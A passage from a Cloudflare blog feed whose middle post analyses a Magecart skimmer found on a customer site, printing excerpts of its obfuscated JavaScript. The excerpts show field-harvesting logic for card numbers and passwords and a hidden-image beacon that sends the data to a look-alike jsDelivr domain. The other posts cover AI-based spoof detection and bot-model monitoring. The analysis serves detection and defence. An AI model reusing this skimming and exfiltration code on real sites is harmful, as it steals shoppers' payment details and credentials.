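// Hypothetical sketch of a Labyrinth-style check: flag an email when its
// body references a domain on the customer's known-good sender list, but
// the actual sending domain is not on that list. Names are illustrative.
function isLikelySpoof(senderDomain, referencedDomains, knownGoodSenders) {
  const verified = new Set(knownGoodSenders);
  if (verified.has(senderDomain)) return false; // sent by a verified partner
  // An unverified sender name-dropping a verified partner domain is suspicious.
  return referencedDomains.some((d) => verified.has(d));
}
```

An unverified sender whose message name-drops a verified partner domain is exactly the spoofing pattern described above.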
    <div>
      <h3>Zero-Trust security protected and powered by AI</h3>
      <a href="#zero-trust-security-protected-and-powered-by-ai">
        
      </a>
    </div>
    <p>Cloudflare <a href="https://www.cloudflare.com/en-gb/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> provides administrators the tools to protect access to their IT infrastructure by enforcing strict identity verification for every person and device regardless of whether they are sitting within or outside the network perimeter.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qpOOjCeP6yqWtYrSgJdCu/4693906c9faf833a57db45672472f23d/Cloudflare-One-User-Risk-Scores_b.png" />
            
</figure><p>One of the big challenges is to enforce strict access control while reducing the friction introduced by frequent verifications. Existing solutions also put pressure on IT teams that need to analyze log data to track how risk is evolving within their infrastructure. Sifting through a huge amount of data to find rare attacks requires large teams and substantial budgets.</p><p>Cloudflare simplifies this process by introducing behavior-based user risk scoring. Leveraging AI, we analyze real-time data to identify anomalies in users’ behavior and signals that could lead to harm to the organization. This provides administrators with recommendations on how to tailor the security posture based on user behavior.</p><p>Zero Trust user risk scoring detects user activity and behaviors that could introduce risk to your organization, systems, and data, and assigns a score of Low, Medium, or High to the user involved. This approach is sometimes referred to as <a href="https://www.cloudflare.com/learning/security/what-is-ueba/">user and entity behavior analytics (UEBA)</a> and enables teams to detect and remediate possible account compromise, company policy violations, and other risky activity.</p><p>The first contextual behavior we are launching is “impossible travel”, which helps identify if a user’s credentials are being used in two locations that the user could not have traveled between in that period of time. These risk scores can be further extended in the future to highlight personalized behavior risks based on contextual information, such as time-of-day usage patterns and access patterns, to flag any anomalous behavior. Since all traffic is proxied through your Secure Web Gateway (SWG), this can also be extended to the resources being accessed, like an internal company repo.</p><p>We have an exciting launch during Security Week. <a href="/cf1-user-risk-score/">Check out this blog to learn more</a>.</p>
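As a back-of-the-envelope illustration, the "impossible travel" signal reduces to comparing the great-circle distance between two logins against the fastest plausible travel speed. This is a simplified sketch with assumed names and an assumed ~900 km/h ceiling (roughly a direct commercial flight), not Cloudflare's implementation:

```javascript
// Illustrative "impossible travel" check, not Cloudflare's implementation:
// two logins are flagged when the great-circle distance between them implies
// a travel speed beyond what a commercial flight could achieve.
const EARTH_RADIUS_KM = 6371;

function haversineKm(lat1, lon1, lat2, lon2) {
  const toRad = (deg) => (deg * Math.PI) / 180;
  const dLat = toRad(lat2 - lat1);
  const dLon = toRad(lon2 - lon1);
  const a =
    Math.sin(dLat / 2) ** 2 +
    Math.cos(toRad(lat1)) * Math.cos(toRad(lat2)) * Math.sin(dLon / 2) ** 2;
  return 2 * EARTH_RADIUS_KM * Math.asin(Math.sqrt(a));
}

// Each login is { lat, lon, time } with time in milliseconds since epoch.
function isImpossibleTravel(loginA, loginB, maxSpeedKmh = 900) {
  const km = haversineKm(loginA.lat, loginA.lon, loginB.lat, loginB.lon);
  const hours = Math.abs(loginB.time - loginA.time) / 3.6e6; // ms -> hours
  return km > maxSpeedKmh * hours;
}
```

London to Sydney within an hour trips the check; London to Paris over an afternoon does not.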
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>From application and email security to <a href="https://www.cloudflare.com/network-security/">network security</a> and Zero Trust, we are witnessing attackers leveraging new technologies to be more effective in achieving their goals. In the last few years, multiple Cloudflare product and engineering teams have adopted intelligent systems to better identify abuse and <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/">increase protection</a>.</p><p>Beyond the generative AI craze, AI is already a crucial part of how we defend digital assets against attacks and how we discourage bad actors.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[API Security]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">76ClOKhWKWuLLPML351f39</guid>
            <dc:creator>Daniele Molteni</dc:creator>
            <dc:creator>John Cosgrove</dc:creator>
            <dc:creator>Ayush Kumar</dc:creator>
            <dc:creator>Ankur Aggarwal</dc:creator>
        </item>
        <item>
            <title><![CDATA[Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website]]></title>
            <link>https://blog.cloudflare.com/navigating-the-maze-of-magecart/</link>
            <pubDate>Mon, 04 Mar 2024 14:00:21 GMT</pubDate>
            <description><![CDATA[ E-commerce websites were targeted by a sophisticated Magecart attack, involving a hidden JavaScript code designed to secretly steal Personally Identifiable Information (PII) and credit card details from users ]]></description>
            <content:encoded><![CDATA[ <p>The Cloudflare security research team reviews and evaluates scripts flagged by <a href="https://developers.cloudflare.com/page-shield/">Cloudflare Page Shield</a>, focusing particularly on those with low scores according to our machine learning (ML) model, as <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection">low scores indicate the model thinks they are malicious</a>. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.</p><p>This script was not only obfuscated but exhibited some suspicious behavior, setting off alarm bells within our team. Its complexity and mysterious nature piqued our curiosity, and we decided to delve deeper, to unravel the enigma of what this script was truly up to.</p><p>In our quest to decipher the script's purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.</p><p>The Infection Mechanism: A seemingly harmless HTML <code>div</code> element housed a piece of JavaScript, a trojan horse lying in wait.</p>
            <pre><code>&lt;div style="display: none; visibility: hidden;"&gt;
&lt;script src="//cdn.jsdelivr.at/js/sidebar.min.js"&gt;&lt;/script&gt;
&lt;/div&gt;</code></pre>
            <p><i>The script was the conduit for the malicious activities</i></p>
    <div>
      <h2>The devil in the details</h2>
      <a href="#the-devil-in-the-details">
        
      </a>
    </div>
    <p>The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the <a href="https://radar.cloudflare.com/scan/6cc5856d-f16d-496d-bfe0-f635bd75bec8/summary">snapshot</a> provided by Cloudflare Radar URL Scanner.</p><p>Obfuscated script snippet:</p>
            <pre><code>function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',
.....</code></pre>
            <p>The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at <a href="https://jsdelivr\[.\]at/f\[.\]php">https://jsdelivr\[.\]at/f\[.\]php</a>.</p>
    <div>
      <h2>Decoding the malicious domain</h2>
      <a href="#decoding-the-malicious-domain">
        
      </a>
    </div>
    <p>Before diving deeper into the exact behavior of a script, examining the domain hosting it can already reveal valuable signals for the overall evaluation. Regarding the domain <code>cdn.jsdelivr.at</code> used by this script:</p><ul><li><p>It was registered on 2022-04-14.</p></li><li><p>It impersonates the well-known hosting service <a href="https://www.jsdelivr.com/">jsDelivr</a>, which is hosted at <code>cdn.jsdelivr.net</code>.</p></li><li><p>It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.</p></li><li><p>Previous mentions of this hosting provider, such as in a tweet by <a href="https://twitter.com/malwrhunterteam/status/1374703390748520448">@malwrhunterteam</a>, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.</p></li></ul>
    <div>
      <h2>Decoding the malicious script</h2>
      <a href="#decoding-the-malicious-script">
        
      </a>
    </div>
    <p>Data Encoding and Decoding Functions: The script uses two functions, <code>wvnso.jzzys</code> and <code>wvnso.cvdqe</code>, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.</p>
            <pre><code>var wvnso = {
  "jzzys": function (_0x5f38f3) {
    return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {
      return String.fromCharCode('0x' + _0x1cf8ee);
    }));
  },
  "cvdqe": function (_0x4fdcee) {
    return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {
      return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);
    }).join(''));
  }</code></pre>
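Stripped of obfuscation, the pair is nothing exotic: a UTF-8-safe Base64 round-trip. Here is a functionally equivalent sketch in Node.js, using <code>Buffer</code> in place of the browser's <code>btoa</code>/<code>atob</code>; the function names are ours, mapped to the obfuscated originals in the comments:

```javascript
// Deobfuscated equivalent of the skimmer's encoding pair. The original's
// encodeURIComponent/%-byte dance is simply a manual UTF-8 encode before
// Base64, which Buffer does directly in Node.js.
function encodePayload(text) {
  // wvnso.jzzys: UTF-8 encode, then Base64
  return Buffer.from(text, "utf8").toString("base64");
}

function decodePayload(b64) {
  // wvnso.cvdqe: Base64 decode, then UTF-8 decode
  return Buffer.from(b64, "base64").toString("utf8");
}
```

Running the skimmer's hard-coded Base64 strings through the decoder reproduces both the field map and the exfiltration endpoint discussed in this post.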
            <p>Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The <code>wvnso.cwwez</code> function maps these fields, showing that the attackers had carefully studied the website’s layout.</p>
            <pre><code>"cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),</code></pre>
            <p>Data Harvesting Logic: The script uses a set of complex functions ( <code>wvnso.uvesz</code>,  <code>wvnso.wsrmf</code>, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects ("harvests") this data and gets it ready to be sent out ("<a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">exfiltrated</a>").</p>
            <pre><code>"uvesz": function (_0x52b255) {
    for (var _0x356fbe = 0x0; _0x356fbe &lt; wvnso.cwwez.length; _0x356fbe++) {
      var _0x25348a = wvnso.cwwez[_0x356fbe];
      if (_0x52b255.hasAttribute(_0x25348a[0x0])) {
        if (typeof _0x25348a[0x1] == "object") {
          var _0xca9068 = '';
          _0x25348a[0x1].forEach(function (_0x450919) {
            var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');
            if (_0x907175 != null &amp;&amp; wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length &gt; 0x0) {
              _0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";
            }
          });
          wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();
        } else {
          if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] &amp;&amp; wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length &gt; 0x0) {
            if (_0x25348a[0x3] == 'l') {
              wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
            } else {
              if (_0x25348a[0x3] == 'y') {
                wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              } else {
                wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              }
            }
          }
        }
      }
    }
  }</code></pre>
            <p>Stealthy Data Exfiltration: After harvesting the data, the script sends it secretly to the attacker's server (located at <a href="https://jsdelivr\[.\]at/f\[.\]php">https://jsdelivr\[.\]at/f\[.\]php</a>). This process is done in a way that mimics normal Internet traffic, making it hard to detect. It creates an Image HTML element programmatically (not displayed to the user) and sets its src attribute to a specific URL. This URL is the attacker's server where the stolen data is sent.</p>
            <pre><code>"eubtc": function () {
    var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    if (wvnso.pqemy() &amp;&amp; !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {
      wvnso.rnhok.push(_0x4b786d);
      var _0x49c81a = wvnso.spyed.createElement("IMG");
      _0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;
    }
  }</code></pre>
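Because this channel rides on an ordinary image load, a strict Content-Security-Policy is one mitigation layer that would have blocked this particular beacon: with <code>img-src</code> and <code>connect-src</code> limited to trusted origins, the browser refuses to fetch the attacker's URL. An illustrative policy (a real deployment must allowlist its own legitimate third parties):

```
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; connect-src 'self'
```

CSP alone is not a silver bullet, since a look-alike domain sneaking into an allowlist defeats it, which is why script monitoring remains necessary.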
            <p>Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.</p><p>Execution Interval: The script is set to activate its data-collecting actions at regular intervals, as shown by the <code>window.setInterval(wvnso.bumdr, 0x1f4)</code> function call (<code>0x1f4</code> is 500, i.e. every 500 milliseconds). This ensures that it constantly checks for new user input on the site.</p>
            <pre><code>window.setInterval(wvnso.bumdr, 0x1f4);</code></pre>
            <p>Local Data Storage: Interestingly, the script uses local storage methods (<code>wvnso.hajfd</code>, <code>wvnso.ijltb</code>) to keep the collected data on the user's device. This could be a way to prevent data loss in case there are issues with the Internet connection, or to gather more data before sending it to the server.</p>
            <pre><code>"ijltb": function () {
    var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    window.localStorage.setItem("oybwd", _0x19c563);
  },
  "hajfd": function () {
    var _0x1318e0 = window.localStorage.getItem("oybwd");
    if (_0x1318e0 !== null) {
      wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));
    }
  }</code></pre>
            <p>This JavaScript code is a sophisticated tool for stealing sensitive information from users. It's well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.</p>
    <div>
      <h2>Proactive detection</h2>
      <a href="#proactive-detection">
        
      </a>
    </div>
    <p><a href="/detecting-magecart-style-attacks-for-pageshield">Page Shield's existing machine learning algorithm</a> is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield's ML automatically flagged the above script as a Magecart type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare <a href="https://developers.cloudflare.com/page-shield/get-started/">customers with Page Shield enabled</a> will soon be able to take further advantage of our latest ML's superior protection for client-side security. Stay tuned for more details.</p>
    <div>
      <h2>What you can do</h2>
      <a href="#what-you-can-do">
        
      </a>
    </div>
    <p>The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.</p><p>We recommend the following actions to <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/">enhance security and protect against similar threats</a>. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:</p><ol><li><p><a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/"><b>Implement WAF Managed Rule Product</b></a>: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.</p></li><li><p><a href="/tag/waf-attack-score"><b>Deploy ML-Based WAF Attack Score</b></a>: Our ML-based WAF, known as <b>Attack Score</b>, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.</p></li><li><p><b>Use</b> <a href="https://www.cloudflare.com/application-services/products/page-shield/"><b>Page Shield</b></a>: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. 
This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.</p></li><li><p><a href="https://developers.cloudflare.com/waf/managed-rules/"><b>Activate Sensitive Data Detection (SDD)</b></a>: <b>SDD</b> alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.</p></li></ol><p>[1]: <a href="https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore">https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore</a></p><p>[2]: <a href="https://www.bizcommunity.com/Article/196/661/241908.html">https://www.bizcommunity.com/Article/196/661/241908.html</a></p><p>[3]: <a href="https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/">https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/</a></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Magecart]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">4odIoq7Ft2hBT870pJ4OAf</guid>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[Monitoring machine learning models for bot detection]]></title>
            <link>https://blog.cloudflare.com/monitoring-machine-learning-models-for-bot-detection/</link>
            <pubDate>Fri, 16 Feb 2024 14:00:05 GMT</pubDate>
            <description><![CDATA[ We recently shared an introduction to Cloudflare’s approach to MLOps, which provides a holistic overview of model training and deployment processes at Cloudflare. In this post, we will dig deeper into monitoring, and how we continuously evaluate the models that power Bot Management ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/VESHCwzMz14WZD7uL9VfD/b448fcd03ff4209734a660fa01b3ea8a/image4-5.png" />
            
            </figure><p>Cloudflare’s <a href="/cloudflare-bot-management-machine-learning-and-more/">Bot Management</a> is used by organizations around the world to proactively detect and mitigate automated bot traffic. To do this, Cloudflare leverages machine learning models that help predict whether a particular HTTP request is coming from a bot or not, and further distinguishes between benign and malicious bots. Cloudflare serves over 55 million HTTP requests per second — so our machine learning models need to run at Cloudflare scale.</p><p>We are constantly making improvements to the models that power Bot Management to ensure they are incorporating the latest threat intelligence. This process of iteration is an important part of ensuring our customers stay a step ahead of malicious actors, and it requires a rigorous process for experimentation, deployment, and ongoing observation.</p><p>We recently shared an introduction to <a href="/mlops/">Cloudflare’s approach to MLOps</a>, which provides a holistic overview of model training and deployment processes at Cloudflare. In this post, we will dig deeper into monitoring, and how we continuously evaluate the models that power <a href="https://www.cloudflare.com/learning/bots/what-is-bot-management/">Bot Management</a>.</p>
    <div>
      <h2>Why monitoring matters</h2>
      <a href="#why-monitoring-matters">
        
      </a>
    </div>
    <p>Before bot detection models are released, we undergo an extensive model testing/validation process to ensure our detections perform as expected. Model performance is validated across a wide number of web traffic segments, by browser, HTTP protocol, and other dimensions to get a fine-grained view into how we expect the model to perform once deployed. If everything checks out, the model is gradually released into production, and we get a level up in our bot detections.</p><p>After models are deployed to production, it can be challenging to get visibility into performance on a granular level. Sure, we can look at outcomes-based metrics — like <a href="https://developers.cloudflare.com/bots/concepts/bot-score/#:~:text=A%20bot%20score%20is%20a,request%20came%20from%20a%20human.">bot score</a> distributions, or <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/actions/">challenge</a> solve rates. These are informative, but with any change in bot scoring or challenge solve rates, we're still left asking, "Which segments of web traffic are most impacted by this change? Was that expected?".</p><p>To train a model for the Internet is to train a model against a moving target. Anyone can train a model on static data and achieve great results — so long as the input does not change. Building a model that generalizes into the future, with new threats, browsers, and bots is a more difficult task. Machine learning monitoring is an important part of the story because it provides confidence that our models continue to generalize, using a rigorous and repeatable process.</p><p>In the days before machine learning monitoring, the team would analyze web traffic patterns and model scoring results to track the proportion of web requests scored as bot or human. This high-level metric is helpful for evaluating performance of the model in the aggregate, but didn’t provide granular detail into how the model was behaving with particular types of traffic. 
For a deeper analysis, we’d be left with the additional work of investigating performance on individual traffic segments, such as traffic from the Chrome browser or from iOS clients.</p><p>With machine learning monitoring, we get insights into how the model behaves not just at a high level, but in a much more granular way, without having to do a lot of manual investigation. The monitoring closes the feedback loop by answering the critical question: "How are our bot detection models performing <i>in production</i>?" Monitoring gives us the same level of confidence derived from pre-deployment model validation/testing, except applied to all models in production.</p><p>The use cases for which monitoring has proven invaluable include:</p><ul><li><p><b>Investigating bot score anomalies</b>: If a customer reports machine learning scoring false positives/negatives, and we suspect broader issues across a subset of detections, monitoring can help zero in on the answer. Engineers can find insights from our global monitoring dashboard, or focus on performance for a specific dataset.</p></li><li><p><b>Monitoring any model predictions or request field</b>: The monitoring service is flexible and can add <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">an observability layer</a> over any request artifact stored in our web requests databases. If model predictions or outcomes of interest are stored with our request logs, then they can be monitored. We can work across engineering teams to enable monitoring for any outcome.</p></li><li><p><b>Deploying new models</b>: We gradually deploy new model versions, eventually ramping up to running across Cloudflare’s global web traffic. Along the way, we have a series of checks before a new model can be deployed to the next release step. 
Monitoring allows us to compare the latest model with the previous version against granular traffic segments at each deployment stage — giving us confidence when proceeding forward with the rollout.</p></li></ul>
    <div>
      <h2>How does machine learning monitoring work?</h2>
      <a href="#how-does-machine-learning-monitoring-work">
        
      </a>
    </div>
    <p>The process begins with a ground-truth dataset — a set of traffic data known to be either human or bot-generated, labeled accordingly and accurately. If our model identifies a particular request as bot traffic, when our ground-truth label indicates it originated from a human, then we know the model has miscategorized the request, and vice versa. This kind of labeled data, where we flag traffic as being from a bot or a human, is what our model is trained on to learn to make detections in the first place.</p><p>Datasets gathered at training time allow us to evaluate the performance of a trained model for that snapshot in time. Since we want to continuously evaluate model performance in production, we need to likewise get real-time labeled data to compare against our bot score. We can generate a labeled dataset for this purpose when we’re certain that web requests come from a certain actor. For example, our <a href="https://developers.cloudflare.com/bots/concepts/bot-score/#heuristics">heuristics engine</a> is one source of high-confidence labeled data. Other sources of reliable, labeled data include customer feedback and attack pattern research.</p><p>We can directly compare our model’s bot scores on web requests against recently-labeled datasets to judge model performance. To ensure that we are making an apples-to-apples comparison as we evaluate the model’s score over time, consistency is paramount: the data itself will be different, but we want the methodology, conditions, and filters to remain the same between sampling windows. We have automated this process, allowing us to generate labeled datasets in real-time that give us an up-to-the-minute view of model performance.</p>
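The core of that comparison fits in a few lines. A minimal sketch (not our production code; the field names and the bot-score threshold of 30 are illustrative, with low scores meaning "likely bot"):

```javascript
// Sketch of the core monitoring comparison: score each labeled request
// with the model and measure accuracy against the ground-truth label.
// scoreFn returns a bot score; scores below botThreshold mean "bot".
function accuracy(requests, scoreFn, botThreshold = 30) {
  let correct = 0;
  for (const req of requests) {
    const predictedBot = scoreFn(req) < botThreshold;
    if (predictedBot === req.labeledBot) correct++;
  }
  return correct / requests.length;
}
```

Re-running this over a continuously refreshed labeled dataset is what turns a one-off validation number into an up-to-the-minute view of model performance.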
    <div>
      <h3>Getting granular performance metrics</h3>
      <a href="#getting-granular-performance-metrics">
        
      </a>
    </div>
    <p>Let's say we detect a sudden drop in accuracy on a given dataset labeled as bot traffic, meaning our detection is incorrectly scoring bots as human traffic. We would be keen to determine the exact subset of traffic responsible for the scoring miss. Is it coming from the latest Chrome browser or maybe a certain <a href="https://www.cloudflare.com/en-gb/learning/network-layer/what-is-an-autonomous-system/">ASN</a>?</p><p>To answer this, performance monitoring uses specializations, which are filters applied against our dataset that focus on a dimension of interest (e.g. browser type, ASN). With specializations on datasets, we get both an expectation on how traffic <i>should </i> have been scored, and insight into the exact dimension causing the miss.</p>
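A specialization can be thought of as the same metric computed per value of a dimension. A simplified sketch, with illustrative field names (not our actual schema):

```javascript
// Sketch of "specializations": accuracy computed per traffic dimension
// (browser, ASN, ...), so a scoring miss can be pinned to a segment.
// scoreFn returns a bot score; scores below botThreshold mean "bot".
function accuracyBySegment(requests, scoreFn, dimension, botThreshold = 30) {
  const segments = new Map();
  for (const req of requests) {
    const key = req[dimension]; // e.g. req.browser or req.asn
    const seg = segments.get(key) ?? { correct: 0, total: 0 };
    const predictedBot = scoreFn(req) < botThreshold;
    if (predictedBot === req.labeledBot) seg.correct++;
    seg.total++;
    segments.set(key, seg);
  }
  // Reduce each segment to its accuracy ratio.
  return new Map([...segments].map(([k, v]) => [k, v.correct / v.total]));
}
```

A sudden dip in one segment's ratio, say a single browser or ASN, points directly at the traffic responsible for the miss.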
    <div>
      <h3>Integrating monitoring into our bots machine learning platform</h3>
      <a href="#integrating-monitoring-into-our-bots-machine-learning-platform">
        
      </a>
    </div>
    <p>The monitoring system runs on a unified platform called <i>Endeavour</i>, which we built to handle all aspects of bots-related machine learning, including model training and validation, model interpretability, and delivering the most up-to-date information to our servers running bot detection. We can break down monitoring into a few tasks: rendering monitoring queries to fetch datasets, computing performance metrics, and storing metrics. Endeavour uses <a href="https://airflow.apache.org/">Airflow</a>, a workflow execution engine, making it a great place to run our monitoring tasks on top of a Kubernetes cluster and GPUs, with access to Postgres and <a href="https://clickhouse.com/">ClickHouse</a> databases.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/52wZKzjuR1lNMYAdyFS0Kb/1bcfe3a0f290772ee1cbd369cbcdf937/Monitoring-machine-learning-models-for-bot-detection.png" />
            
            </figure>
    <div>
      <h3>Rendering monitoring queries</h3>
      <a href="#rendering-monitoring-queries">
        
      </a>
    </div>
    <p>A monitoring query is simply a SQL query to our <a href="/http-analytics-for-6m-requests-per-second-using-clickhouse/">ClickHouse web request database</a> asking, "How does machine learning scoring look right now?" The query gets more precise when we add in dataset and specialization conditions so that we can ask a more refined question: "For this set of known (non-)automated traffic, how does machine learning scoring look along these dimensions of interest?"</p><p>In our system, datasets for training and validation are determined using SQL queries, which are tailored to capture segments of request traffic, such as traffic flagged as bots by our heuristics engine. For model monitoring, we adapt these queries to measure performance metrics like accuracy and continuously update the time range to measure the latest model performance. For each dataset used in training and validation, we can generate a monitoring query that produces real-time insight into model performance.</p>
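<p>As a rough sketch of what rendering a monitoring query might look like, the snippet below fills a SQL template with a dataset condition and a specialization dimension. The table and column names are invented for illustration and do not reflect our actual schema.</p>

```python
# Hypothetical query renderer: 'requests', 'bot_score', and
# 'heuristic_flag' are placeholder names, not a real schema.
QUERY_TEMPLATE = """
SELECT {dimension}, avg(bot_score <= {threshold}) AS bot_rate
FROM requests
WHERE timestamp >= now() - INTERVAL {minutes} MINUTE
  AND {dataset_condition}
GROUP BY {dimension}
""".strip()

def render_monitoring_query(dataset_condition, dimension,
                            threshold=30, minutes=15):
    # The time range slides forward on every run, giving an
    # up-to-the-minute view; everything else stays fixed so that
    # results are comparable between sampling windows.
    return QUERY_TEMPLATE.format(
        dataset_condition=dataset_condition,
        dimension=dimension,
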